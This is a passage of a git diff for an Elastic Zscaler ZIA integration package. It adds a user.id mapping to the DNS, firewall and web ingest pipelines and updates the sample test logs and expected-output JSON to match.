"address": "175.16.199.1", "ip": "175.16.199.1", @@ -34,7 +34,7 @@ } }, { - "@timestamp": "2023-12-31T13:02:05.000Z", + "@timestamp": "2024-12-31T13:02:05.000Z", "destination": { "address": "81.2.69.193", "ip": "81.2.69.193", @@ -68,7 +68,7 @@ } }, { - "@timestamp": "2023-12-31T14:03:06.000Z", + "@timestamp": "2024-12-31T14:03:06.000Z", "destination": { "address": "81.2.69.193", "ip": "81.2.69.193" diff --git a/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns-http-endpoint.log b/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns-http-endpoint.log index d4ec642282d..ed62cd3d6d5 100644 --- a/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns-http-endpoint.log +++ b/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns-http-endpoint.log @@ -1 +1,3 @@ {"sourcetype":"zscalernss-dns","input": {"type": "http_endpoint"}, "event":{"location":"Unknown","deviceowner":"NA","devicehostname":"NA","dns_req":"Unknown","resaction":"None","durationms":"34000","category":"Other","resrulelabel":"None","dns_reqtype":"NotFound","dns_resp":"NotFound","department":"Unknown","user":"Unknown","reqaction":"None","datetime":"Tue Dec 31 02:22:22 2021","srv_dip":"0.0.0.0","clt_sip":"0.0.0.0","reqrulelabel":"None","srv_dport":"0"}} +{"sourcetype":"zscalernss-dns","input": {"type": "http_endpoint"}, "event":{"location":"Unknown","deviceowner":"NA","devicehostname":"NA","dns_req":"Unknown","resaction":"None","durationms":"34000","category":"Other","resrulelabel":"None","dns_reqtype":"NotFound","dns_resp":"NotFound","department":"Unknown","user":"Unknown","reqaction":"None","time":"Tue Dec 31 02:22:22 2021","srv_dip":"0.0.0.0","clt_sip":"0.0.0.0","reqrulelabel":"None","srv_dport":"0"}} +{"sourcetype":"zscalernss-dns","input": {"type": "http_endpoint"}, "event":{"location":"Unknown","deviceowner":"NA","devicehostname":"NA","dns_req":"Unknown","resaction":"None","durationms":"34000","category":"Other","resrulelabel":"None","dns_reqtype":"NotFound","dns_resp":"NotFound","department":"Unknown","user":"person@example.com","reqaction":"None","datetime":"Tue Dec 31 02:22:22 2021","srv_dip":"0.0.0.0","clt_sip":"0.0.0.0","reqrulelabel":"None","srv_dport":"0"}} diff --git a/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns-http-endpoint.log-expected.json b/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns-http-endpoint.log-expected.json index da65622f0b6..18390f4c339 100644 --- a/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns-http-endpoint.log-expected.json +++ b/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns-http-endpoint.log-expected.json @@ -51,6 +51,7 @@ "preserve_original_event" ], "user": { + "id": "Unknown", "name": [ "Unknown" ] @@ -79,6 +80,166 @@ } } } + }, + { + "@timestamp": "2021-12-31T02:22:22.000Z", + "destination": { + "ip": "0.0.0.0", + "port": 0 + }, + "dns": { + "answers": { + "name": "NotFound" + }, + "question": { + "name": "Unknown", + "type": "NotFound" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "network" + ], + "duration": 34000000000, + "kind": "event", + "original": "{\"sourcetype\":\"zscalernss-dns\",\"input\": {\"type\": \"http_endpoint\"}, \"event\":{\"location\":\"Unknown\",\"deviceowner\":\"NA\",\"devicehostname\":\"NA\",\"dns_req\":\"Unknown\",\"resaction\":\"None\",\"durationms\":\"34000\",\"category\":\"Other\",\"resrulelabel\":\"None\",\"dns_reqtype\":\"NotFound\",\"dns_resp\":\"NotFound\",\"department\":\"Unknown\",\"user\":\"Unknown\",\"reqaction\":\"None\",\"time\":\"Tue Dec 31 02:22:22 2021\",\"srv_dip\":\"0.0.0.0\",\"clt_sip\":\"0.0.0.0\",\"reqrulelabel\":\"None\",\"srv_dport\":\"0\"}}", + "type": [ + "info" + ] + }, + "network": { + "protocol": "dns" + }, + "related": { + "hosts": [ + "Unknown", + "NotFound" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "Unknown" + ] + }, + "source": { + "ip": "0.0.0.0" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "id": "Unknown", + "name": [ + "Unknown" + ] + }, + "zscaler_zia": { + "dns": { + "department": "Unknown", + "dom": { + "category": "Other" + }, + "duration": { + "milliseconds": 34000 + }, + "location": "Unknown", + "request": { + "action": "None", + "rule": { + "label": "None" + } + }, + "response": { + "action": "None", + "rule": { + "label": "None" + } + } + } + } + }, + { + "@timestamp": "2021-12-31T02:22:22.000Z", + "destination": { + "ip": "0.0.0.0", + "port": 0 + }, + "dns": { + "answers": { + "name": "NotFound" + }, + "question": { + "name": "Unknown", + "type": "NotFound" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "network" + ], + "duration": 34000000000, + "kind": "event", + "original": "{\"sourcetype\":\"zscalernss-dns\",\"input\": {\"type\": \"http_endpoint\"}, \"event\":{\"location\":\"Unknown\",\"deviceowner\":\"NA\",\"devicehostname\":\"NA\",\"dns_req\":\"Unknown\",\"resaction\":\"None\",\"durationms\":\"34000\",\"category\":\"Other\",\"resrulelabel\":\"None\",\"dns_reqtype\":\"NotFound\",\"dns_resp\":\"NotFound\",\"department\":\"Unknown\",\"user\":\"person@example.com\",\"reqaction\":\"None\",\"datetime\":\"Tue Dec 31 02:22:22 2021\",\"srv_dip\":\"0.0.0.0\",\"clt_sip\":\"0.0.0.0\",\"reqrulelabel\":\"None\",\"srv_dport\":\"0\"}}", + "type": [ + "info" + ] + }, + "network": { + "protocol": "dns" + }, + "related": { + "hosts": [ + "Unknown", + "NotFound" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "person@example.com" + ] + }, + "source": { + "ip": "0.0.0.0" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "email": "person@example.com", + "id": "person@example.com" + }, + "zscaler_zia": { + "dns": { + "department": "Unknown", + "dom": { + "category": "Other" + }, + "duration": { + "milliseconds": 34000 + }, + "location": "Unknown", + "request": { + "action": "None", + "rule": { + "label": "None" + } + }, + "response": { + "action": "None", + "rule": { + "label": "None" + } + } + } + } } ] } \ No newline at end of file diff --git a/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json b/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json index a7f3707f301..58b1b66b0c6 100644 --- a/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json +++ b/packages/zscaler_zia/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json @@ -64,7 +64,8 @@ "89.160.20.156" ], "user": [ - "Owner77" + "Owner77", + "some_user@example.com" ] }, "source": { @@ -93,6 +94,7 @@ ], "user": { "email": "some_user@example.com", + "id": "some_user@example.com", "name": [ "Owner77" ] @@ -187,7 +189,8 @@ "89.160.20.156" ], "user": [ - "Owner77" + "Owner77", + "some_user@example.com" ] }, "source": { @@ -216,6 +219,7 @@ ], "user": { "email": "some_user@example.com", + "id": "some_user@example.com", "name": [ "Owner77" ] diff --git a/packages/zscaler_zia/data_stream/dns/elasticsearch/ingest_pipeline/default.yml b/packages/zscaler_zia/data_stream/dns/elasticsearch/ingest_pipeline/default.yml index 9ee34980c76..ce43414bfad 100644 --- a/packages/zscaler_zia/data_stream/dns/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zscaler_zia/data_stream/dns/elasticsearch/ingest_pipeline/default.yml @@ -212,6 +212,10 @@ processors: - append: field: error.message value: '{{{_ingest.on_failure_message}}}' + - set: + field: user.id + copy_from: json.user + ignore_empty_value: true - urldecode: field: json.user target_field: user.email @@ -239,6 +243,11 @@ processors: value: '{{{_ingest._value}}}' allow_duplicates: false ignore_missing: true + - append: + field: related.user + value: '{{{user.id}}}' + allow_duplicates: false + if: ctx.user?.id != null - urldecode: field: json.department target_field: zscaler_zia.dns.department diff --git a/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall-http-endpoint.log-expected.json b/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall-http-endpoint.log-expected.json index 3da143cc068..cc75e231391 100644 --- a/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall-http-endpoint.log-expected.json +++ b/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall-http-endpoint.log-expected.json @@ -49,6 +49,7 @@ "preserve_original_event" ], "user": { + "id": "Unknown", "name": [ "Unknown" ] diff --git a/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall.log b/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall.log index c6ab96b1171..47bfa94098d 100644 --- a/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall.log +++ b/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall.log @@ -1 +1,2 @@ { "sourcetype" : "zscalernss-fw", "event" :{"datetime":"Fri Dec 31 07:07:07 2021","user":"some_user@example.com","department":"Unknown","locationname":"TestLoc%20DB","cdport":443,"csport":55018,"sdport":443,"ssport":0,"csip":"0.0.0.0","cdip":"0.0.0.0","ssip":"0.0.0.0","sdip":"0.0.0.0","tsip":"0.0.0.0","tunsport":0,"tuntype":"ZscalerClientConnector","action":"Drop","dnat":"No","stateful":"Yes","aggregate":"No","nwsvc":"HTTPS","nwapp":"http","proto":"TCP","ipcat":"Test Name","destcountry":"Ireland","avgduration":486,"rulelabel":"Access%20Blocked","inbytes":19052,"outbytes":1734,"duration":4,"durationms":4861,"numsessions":1,"ipsrulelabel":"None","threatcat":"None","threatname":"None","deviceowner":"admin77","devicehostname":"Machine9000"}} +{ "sourcetype" : "zscalernss-fw", "event" :{"datetime":"Fri Dec 31 07:07:07 2021","user":"some_user","department":"Unknown","locationname":"TestLoc%20DB","cdport":443,"csport":55018,"sdport":443,"ssport":0,"csip":"0.0.0.0","cdip":"0.0.0.0","ssip":"0.0.0.0","sdip":"0.0.0.0","tsip":"0.0.0.0","tunsport":0,"tuntype":"ZscalerClientConnector","action":"Drop","dnat":"No","stateful":"Yes","aggregate":"No","nwsvc":"HTTPS","nwapp":"http","proto":"TCP","ipcat":"Test Name","destcountry":"Ireland","avgduration":486,"rulelabel":"Access%20Blocked","inbytes":19052,"outbytes":1734,"duration":4,"durationms":4861,"numsessions":1,"ipsrulelabel":"None","threatcat":"None","threatname":"None","devicehostname":"Machine9000"}} diff --git a/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json b/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json index 1661d532031..770f4d6ca5e 100644 --- a/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json +++ b/packages/zscaler_zia/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json @@ -42,7 +42,8 @@ "0.0.0.0" ], "user": [ - "admin77" + "admin77", + "some_user@example.com" ] }, "rule": { @@ -61,6 +62,7 @@ ], "user": { "email": "some_user@example.com", + "id": "some_user@example.com", "name": [ "admin77" ] @@ -107,6 +109,114 @@ } } } + }, + { + "@timestamp": "2021-12-31T07:07:07.000Z", + "destination": { + "bytes": 19052, + "geo": { + "country_name": "Ireland" + }, + "ip": "0.0.0.0", + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "drop", + "category": [ + "network" + ], + "duration": 4861000000, + "kind": "event", + "original": "{ \"sourcetype\" : \"zscalernss-fw\", \"event\" :{\"datetime\":\"Fri Dec 31 07:07:07 2021\",\"user\":\"some_user\",\"department\":\"Unknown\",\"locationname\":\"TestLoc%20DB\",\"cdport\":443,\"csport\":55018,\"sdport\":443,\"ssport\":0,\"csip\":\"0.0.0.0\",\"cdip\":\"0.0.0.0\",\"ssip\":\"0.0.0.0\",\"sdip\":\"0.0.0.0\",\"tsip\":\"0.0.0.0\",\"tunsport\":0,\"tuntype\":\"ZscalerClientConnector\",\"action\":\"Drop\",\"dnat\":\"No\",\"stateful\":\"Yes\",\"aggregate\":\"No\",\"nwsvc\":\"HTTPS\",\"nwapp\":\"http\",\"proto\":\"TCP\",\"ipcat\":\"Test Name\",\"destcountry\":\"Ireland\",\"avgduration\":486,\"rulelabel\":\"Access%20Blocked\",\"inbytes\":19052,\"outbytes\":1734,\"duration\":4,\"durationms\":4861,\"numsessions\":1,\"ipsrulelabel\":\"None\",\"threatcat\":\"None\",\"threatname\":\"None\",\"devicehostname\":\"Machine9000\"}}", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Machine9000" + }, + "network": { + "application": "http", + "community_id": "1:hQwW1HWTOUYlk7y4+T2D+UPDU1c=", + "protocol": "https", + "transport": "tcp" + }, + "related": { + "hosts": [ + "Machine9000" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "some_user" + ] + }, + "rule": { + "name": [ + "Access Blocked", + "None" + ] + }, + "source": { + "bytes": 1734, + "ip": "0.0.0.0", + "port": 55018 + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "id": "some_user", + "name": [ + "some_user" + ] + }, + "zscaler_zia": { + "firewall": { + "aggregate": "No", + "client": { + "destination": { + "ip": "0.0.0.0", + "port": 443 + } + }, + "department": "Unknown", + "duration": { + "avg": 486, + "milliseconds": 4861, + "seconds": 4 + }, + "hostname": "Machine9000", + "ip_category": "Test Name", + "location": { + "name": "TestLoc DB" + }, + "nat": "No", + "server": { + "source": { + "ip": "0.0.0.0", + "port": 0 + } + }, + "session": { + "count": 1.0 + }, + "stateful": "Yes", + "threat": { + "category": "None", + "name": "None" + }, + "tunnel": { + "ip": "0.0.0.0", + "port": 0, + "type": "ZscalerClientConnector" + } + } + } } ] } \ No newline at end of file diff --git a/packages/zscaler_zia/data_stream/firewall/elasticsearch/ingest_pipeline/default.yml b/packages/zscaler_zia/data_stream/firewall/elasticsearch/ingest_pipeline/default.yml index e95fbfe755d..fbcf6bef6d3 100644 --- a/packages/zscaler_zia/data_stream/firewall/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zscaler_zia/data_stream/firewall/elasticsearch/ingest_pipeline/default.yml @@ -151,6 +151,10 @@ processors: field: json.destcountry target_field: destination.geo.country_name ignore_missing: true + - set: + field: user.id + copy_from: json.user + ignore_empty_value: true - urldecode: field: json.user target_field: user.email @@ -178,6 +182,11 @@ processors: value: '{{{_ingest._value}}}' allow_duplicates: false ignore_missing: true + - append: + field: related.user + value: '{{{user.id}}}' + allow_duplicates: false + if: ctx.user?.id != null && ctx.user.id != '' - urldecode: field: json.department target_field: zscaler_zia.firewall.department diff --git a/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web-http-endpoint.log-expected.json b/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web-http-endpoint.log-expected.json index 6d984f907cc..475a6756a69 100644 --- a/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web-http-endpoint.log-expected.json +++ b/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web-http-endpoint.log-expected.json @@ -48,7 +48,8 @@ ], "user": [ "test", - "administrator1" + "administrator1", + "test@example.com" ] }, "rule": { @@ -73,6 +74,7 @@ "user": { "domain": "example.com", "email": "test@example.com", + "id": "test@example.com", "name": [ "test", "administrator1" @@ -172,7 +174,8 @@ ], "user": [ "test", - "administrator1" + "administrator1", + "test@example.com" ] }, "rule": { @@ -197,6 +200,7 @@ "user": { "domain": "example.com", "email": "test@example.com", + "id": "test@example.com", "name": [ "test", "administrator1" diff --git a/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web.log b/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web.log index ffbc90fbd27..288b661c8dc 100644 --- a/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web.log +++ b/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web.log @@ -5,3 +5,7 @@ { "sourcetype" : "zscalernss-web", "event" :{"time":"Fri Dec 31 07:07:07 2021","login":"test@example.com","proto":"HTTPS","eurl":"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1","action":"Blocked","appname":"General Browsing","appclass":"General Browsing","reqsize":"297","respsize":"14135","stime":"0","ctime":"0","urlclass":"Business Use","urlsupercat":"Business and Economy","urlcat":"Corporate Marketing","malwarecat":"None","threatname":"None","riskscore":"0","dlpeng":"None","dlpdict":"None","location":"Test DB","dept":"Unknown","cip":"81.2.69.193","sip":"81.2.69.143","reqmethod":"GET","respcode":"403","eua":"Microsoft-Delivery-Optimization/10.0","ereferer":"None","ruletype":"FwFilter","rulelabel":"Access Blocked","contenttype":"Other","unscannabletype":"None","deviceowner":"administrator1","devicehostname":"TestMachine35"}} { "sourcetype" : "zscalernss-web", "event" :{"time":"Thu Aug 29 09:20:35 2022","login":"test@example.com","proto":"HTTP_PROXY","eurl":"www.example.com:443","action":"Allowed","appname":"General Browsing","appclass":"General Browsing","reqsize":"555","respsize":"65","stime":"0","ctime":"0","urlclass":"Business Use","urlsupercat":"Information Technology","urlcat":"Web Search","malwarecat":"None","threatname":"None","riskscore":"0","dlpeng":"None","dlpdict":"None","location":"Test","dept":"Unknown","cip":"81.2.69.193","sip":"89.160.20.112","reqmethod":"CONNECT","respcode":"200","eua":"Windows Microsoft Windows 10 Pro ZTunnel/1.0","ereferer":"None","ruletype":"None","rulelabel":"None","contenttype":"Other","unscannabletype":"None","deviceowner":"administrator1","devicehostname":"TestMachine35"}} { "sourcetype" : "zscalernss-web", "event" :{"time":"Fri Dec 31 07:07:07 2021","login":"test@example.com","proto":"HTTPS","eurl":"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1","action":"Blocked","appname":"General Browsing","appclass":"General Browsing","reqsize":"297","respsize":"14135","stime":"0","ctime":"0","urlclass":"Business Use","urlsupercat":"Business and Economy","urlcat":"Corporate Marketing","malwarecat":"None","threatname":"None","riskscore":"0","dlpeng":"None","dlpdict":"None","location":"Test DB","dept":"Unknown","cip":"81.2.69.193","sip":"81.2.69.143","reqmethod":"GET","respcode":"NA","eua":"Windows%20Microsoft%20Windows%2010%20Pro%20ZTunnel%2F1.0","ereferer":"None","ruletype":"FwFilter","rulelabel":"Access Blocked","contenttype":"Other","unscannabletype":"None","deviceowner":"administrator1","devicehostname":"TestMachine35"}} +{ "sourcetype" : "zscalernss-web", "event" :{"time":"Fri Dec 31 07:07:07 2021","login":"test","proto":"HTTPS","eurl":"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1","action":"Blocked","appname":"General Browsing","appclass":"General Browsing","reqsize":"297","respsize":"14135","stime":"0","ctime":"0","urlclass":"Business Use","urlsupercat":"Business and Economy","urlcat":"Corporate Marketing","malwarecat":"None","threatname":"None","riskscore":"0","dlpeng":"None","dlpdict":"None","location":"Test DB","dept":"Unknown","cip":"81.2.69.193","sip":"81.2.69.143","reqmethod":"GET","respcode":"NA","eua":"Windows%20Microsoft%20Windows%2010%20Pro%20ZTunnel%2F1.0","ereferer":"None","ruletype":"FwFilter","rulelabel":"Access Blocked","contenttype":"Other","unscannabletype":"None","devicehostname":"TestMachine35"}} +{ "sourcetype" : "zscalernss-web", "event" :{"time":"Fri Dec 31 07:07:07 2021","login":"test@example.com","proto":"HTTPS","eurl":"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1","action":"Blocked","appname":"General Browsing","appclass":"General Browsing","reqsize":"297","respsize":"14135","stime":"0","ctime":"0","urlclass":"Business Use","urlsupercat":"Business and Economy","urlcat":"Corporate Marketing","malwarecat":"None","threatname":"None","riskscore":"0","dlpeng":"None","dlpdict":"None","location":"Test DB","dept":"Unknown","cip":"81.2.69.193","sip":"81.2.69.143","reqmethod":"GET","respcode":"NA","eua":"Windows%20Microsoft%20Windows%2010%20Pro%20ZTunnel%2F1.0","ereferer":"None","ruletype":"FwFilter","rulelabel":"Access Blocked","contenttype":"Other","unscannabletype":"None","devicehostname":"TestMachine35"}} +{ "sourcetype" : "zscalernss-web", "event" :{"time":"Fri Feb 16 05:33:45 2024","login":"test@example.com","proto":"SSL","eurl":"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1","action":"Allowed","appname":"General Browsing","appclass":"General Browsing","reqsize":"297","respsize":"8022","stime":"316","ctime":"316","urlclass":"Bandwidth Loss","urlsupercat":"User-defined","urlcat":"Corporate Marketing","malwarecat":"None","threatname":"None","riskscore":"0","dlpeng":"None","dlpdict":"None","location":"Test DB","dept":"Unknown Dept","cip":"81.2.69.193","sip":"81.2.69.143","reqmethod":"NA","respcode":"NA","eua":"Unknown","ereferer":"None","ruletype":"None","rulelabel":"None","contenttype":"Other","unscannabletype":"None","deviceowner":"administrator1","devicehostname":"TestMachine35"}} +{ "sourcetype" : "zscalernss-web", "event" :{"time":"Fri Feb 16 05:29:00 2024","login":"test@example.com","proto":"SSL","eurl":"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1","action":"Allowed","appname":"Microsoft Teams","appclass":"Enterprise","reqsize":"297","respsize":"95429","stime":"249000","ctime":"249000","urlclass":"Bandwidth Loss","urlsupercat":"User-defined","urlcat":"Corporate Marketing","malwarecat":"None","threatname":"None","riskscore":"0","dlpeng":"None","dlpdict":"None","location":"Test DB","dept":"Unknown Trans","cip":"81.2.69.193","sip":"81.2.69.143","reqmethod":"NA","respcode":"NA","eua":"Unknown","ereferer":"None","ruletype":"None","rulelabel":"None","contenttype":"Other","unscannabletype":"None","deviceowner":"NA","devicehostname":"NA"}} diff --git a/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web.log-expected.json b/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web.log-expected.json index 8fe849de766..25bbff8a1a5 100644 --- a/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web.log-expected.json +++ b/packages/zscaler_zia/data_stream/web/_dev/test/pipeline/test-web.log-expected.json @@ -48,7 +48,8 @@ ], "user": [ "test", - "administrator1" + "administrator1", + "test@example.com" ] }, "rule": { @@ -73,6 +74,7 @@ "user": { "domain": "example.com", "email": "test@example.com", + "id": "test@example.com", "name": [ "test", "administrator1" @@ -174,7 +176,8 @@ ], "user": [ "test", - "administrator1" + "administrator1", + "test@example.com" ] }, "rule": { @@ -199,6 +202,7 @@ "user": { "domain": "example.com", "email": "test@example.com", + "id": "test@example.com", "name": [ "test", "administrator1" @@ -295,7 +299,8 @@ ], "user": [ "test", - "administrator1" + "administrator1", + "test@example.com" ] }, "rule": { @@ -320,6 +325,7 @@ "user": { "domain": "example.com", "email": "test@example.com", + "id": "test@example.com", "name": [ "test", "administrator1" @@ -421,7 +427,8 @@ ], "user": [ "test", - "administrator1" + "administrator1", + "test@example.com" ] }, "rule": { @@ -446,6 +453,7 @@ "user": { "domain": "example.com", "email": "test@example.com", + "id": "test@example.com", "name": [ "test", "administrator1" @@ -547,7 +555,8 @@ ], "user": [ "test", - "administrator1" + "administrator1", + "test@example.com" ] }, "rule": { @@ -573,6 +582,7 @@ "user": { "domain": "example.com", "email": "test@example.com", + "id": "test@example.com", "name": [ "test", "administrator1" @@ -669,7 +679,8 @@ ], "user": [ "test", - "administrator1" + "administrator1", + "test@example.com" ] }, "rule": { @@ -695,6 +706,7 @@ "user": { "domain": "example.com", "email": "test@example.com", + "id": "test@example.com", "name": [ "test", "administrator1" @@ -795,7 +807,8 @@ ], "user": [ "test", - "administrator1" + "administrator1", + "test@example.com" ] }, "rule": { @@ -821,6 +834,7 @@ "user": { "domain": "example.com", "email": "test@example.com", + "id": "test@example.com", "name": [ "test", "administrator1" @@ -873,6 +887,481 @@ } } } + }, + { + "@timestamp": "2021-12-31T07:07:07.000Z", + "destination": { + "ip": "81.2.69.143" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "blocked", + "category": [ + "web" + ], + "kind": "event", + "original": "{ \"sourcetype\" : \"zscalernss-web\", \"event\" :{\"time\":\"Fri Dec 31 07:07:07 2021\",\"login\":\"test\",\"proto\":\"HTTPS\",\"eurl\":\"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1\",\"action\":\"Blocked\",\"appname\":\"General Browsing\",\"appclass\":\"General Browsing\",\"reqsize\":\"297\",\"respsize\":\"14135\",\"stime\":\"0\",\"ctime\":\"0\",\"urlclass\":\"Business Use\",\"urlsupercat\":\"Business and Economy\",\"urlcat\":\"Corporate Marketing\",\"malwarecat\":\"None\",\"threatname\":\"None\",\"riskscore\":\"0\",\"dlpeng\":\"None\",\"dlpdict\":\"None\",\"location\":\"Test DB\",\"dept\":\"Unknown\",\"cip\":\"81.2.69.193\",\"sip\":\"81.2.69.143\",\"reqmethod\":\"GET\",\"respcode\":\"NA\",\"eua\":\"Windows%20Microsoft%20Windows%2010%20Pro%20ZTunnel%2F1.0\",\"ereferer\":\"None\",\"ruletype\":\"FwFilter\",\"rulelabel\":\"Access Blocked\",\"contenttype\":\"Other\",\"unscannabletype\":\"None\",\"devicehostname\":\"TestMachine35\"}}", + "risk_score": 0.0, + "type": [ + "info" + ] + }, + "host": { + "name": "testmachine35" + }, + "http": { + "request": { + "bytes": 297, + "method": "GET", + "mime_type": "Other", + "referrer": "None" + }, + "response": { + "bytes": 14135 + } + }, + "network": { + "protocol": "https" + }, + "related": { + "hosts": [ + "TestMachine35" + ], + "ip": [ + "81.2.69.193", + "81.2.69.143" + ], + "user": [ + "test" + ] + }, + "rule": { + "name": "Access Blocked", + "ruleset": "FwFilter" + }, + "source": { + "nat": { + "ip": "81.2.69.193" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "www.example.com.com", + "full": "https://www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1", + "original": "https://www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1", + "path": "/params", + "query": "version=10.0.19041.1266&user=65792&Id=1", + "scheme": "https" + }, + "user": { + "id": "test" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "Windows Microsoft Windows 10 Pro ZTunnel/1.0", + "os": { + "full": "Windows 10", + "name": "Windows", + "version": "10" + } + }, + "zscaler_zia": { + "web": { + "app": { + "class": "General Browsing", + "name": "General Browsing" + }, + "ctime": 0, + "department": "Unknown", + "device": { + "hostname": "TestMachine35" + }, + "dpl": { + "dictionaries": "None", + "engine": "None" + }, + "location": "Test DB", + "malware": { + "category": "None" + }, + "stime": 0, + "threat": { + "name": "None" + }, + "unscannable": { + "type": "None" + }, + "url": { + "category": { + "sub": "Corporate Marketing", + "super": "Business and Economy" + }, + "class": "Business Use" + } + } + } + }, + { + "@timestamp": "2021-12-31T07:07:07.000Z", + "destination": { + "ip": "81.2.69.143" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "blocked", + "category": [ + "web" + ], + "kind": "event", + "original": "{ \"sourcetype\" : \"zscalernss-web\", \"event\" :{\"time\":\"Fri Dec 31 07:07:07 2021\",\"login\":\"test@example.com\",\"proto\":\"HTTPS\",\"eurl\":\"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1\",\"action\":\"Blocked\",\"appname\":\"General Browsing\",\"appclass\":\"General Browsing\",\"reqsize\":\"297\",\"respsize\":\"14135\",\"stime\":\"0\",\"ctime\":\"0\",\"urlclass\":\"Business Use\",\"urlsupercat\":\"Business and Economy\",\"urlcat\":\"Corporate Marketing\",\"malwarecat\":\"None\",\"threatname\":\"None\",\"riskscore\":\"0\",\"dlpeng\":\"None\",\"dlpdict\":\"None\",\"location\":\"Test DB\",\"dept\":\"Unknown\",\"cip\":\"81.2.69.193\",\"sip\":\"81.2.69.143\",\"reqmethod\":\"GET\",\"respcode\":\"NA\",\"eua\":\"Windows%20Microsoft%20Windows%2010%20Pro%20ZTunnel%2F1.0\",\"ereferer\":\"None\",\"ruletype\":\"FwFilter\",\"rulelabel\":\"Access Blocked\",\"contenttype\":\"Other\",\"unscannabletype\":\"None\",\"devicehostname\":\"TestMachine35\"}}", + "risk_score": 0.0, + "type": [ + "info" + ] + }, + "host": { + "name": "testmachine35" + }, + "http": { + "request": { + "bytes": 297, + "method": "GET", + "mime_type": "Other", + "referrer": "None" + }, + "response": { + "bytes": 14135 + } + }, + "network": { + "protocol": "https" + }, + "related": { + "hosts": [ + "TestMachine35" + ], + "ip": [ + "81.2.69.193", + "81.2.69.143" + ], + "user": [ + "test", + "test@example.com" + ] + }, + "rule": { + "name": "Access Blocked", + "ruleset": "FwFilter" + }, + "source": { + "nat": { + "ip": "81.2.69.193" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "www.example.com.com", + "full": "https://www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1", + "original": "https://www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1", + "path": "/params", + "query": "version=10.0.19041.1266&user=65792&Id=1", + "scheme": "https" + }, + "user": { + "domain": "example.com", + "email": "test@example.com", + "id": "test@example.com", + "name": "test" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "Windows Microsoft Windows 10 Pro ZTunnel/1.0", + "os": { + "full": "Windows 10", + "name": "Windows", + "version": "10" + } + }, + "zscaler_zia": { + "web": { + "app": { + "class": "General Browsing", + "name": "General Browsing" + }, + "ctime": 0, + "department": "Unknown", + "device": { + "hostname": "TestMachine35" + }, + "dpl": { + "dictionaries": "None", + "engine": "None" + }, + "location": "Test DB", + "malware": { + "category": "None" + }, + "stime": 0, + "threat": { + "name": "None" + }, + "unscannable": { + "type": "None" + }, + "url": { + "category": { + "sub": "Corporate Marketing", + "super": "Business and Economy" + }, + "class": "Business Use" + } + } + } + }, + { + "@timestamp": "2024-02-16T05:33:45.000Z", + "destination": { + "ip": "81.2.69.143" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "allowed", + "category": [ + "web" 